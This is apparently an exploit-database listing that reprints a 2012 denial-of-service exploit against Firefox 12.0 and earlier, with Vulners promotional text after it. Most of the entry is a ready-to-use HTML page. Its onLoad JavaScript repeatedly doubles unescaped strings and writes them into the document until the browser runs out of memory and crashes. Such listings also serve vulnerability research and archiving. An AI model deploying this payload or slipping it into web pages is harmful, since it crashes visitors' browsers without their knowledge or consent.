Lucene search
+L

Mozilla Firefox <= 12.0 Denial Of Service Exploit

🗓️ 05 May 2012 00:00:00Reported by nimaarekType 
zdt
 zdt
🔗 0day.today👁 16 Views

Mozilla Firefox <=12.0 Denial Of Service Exploit visiting this php page causes instant browser cras

Code
Title: Mozilla Firefox <=12.0 Denial Of Service Exploit
Author: L20ot - l20ot[at]yahoo[dot]com
Software Link: http://www.mozilla-europe.org/en/firefox/
Version: 12.0 - lastversion
Tested on: Windows 7 x32\x64
Description: visiting this php page you'll get an instant crash of Firefox
Greetz: nimaarek & MOH3NCODEr [inoob team]


 _        _______  _______  _______ _________
( \      / ___   )(  __   )(  ___  )\__   __/
| (      \/   )  || (  )  || (   ) |   ) (   
| |          /   )| | /   || |   | |   | |   
| |        _/   / | (/ /) || |   | |   | |   
| |       /   _/  |   / | || |   | |   | |   
| (____/\(   (__/\|  (__) || (___) |   | |   
(_______/\_______/(_______)(_______)   )_(   

<html>
<title>FF go away :)</title>
<head>
<script>
function FTB()
 {
    var A1 = unescape("%u4141%u4141");
    var A2 = unescape("%u4242%u4242");
    var A3 = unescape("%u4343%u4343");
    var A4 = unescape("%u4444%u4444");
    for(i=0; i <= 1000 ; ++i)
 {
        A1+=A1;
        A2+=A2;
        A3+=A3;
        A4+=A4;
        document.write(A1);
        document.write(A2);
        document.write(A3);
        document.write(A4);
    }
    document.write(A1);
    document.write(A2);
    document.write(A3);
    document.write(A4);
}
</script>
</head>
<body onLoad="FTB()">
</body>
</html>



#  0day.today [2018-03-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation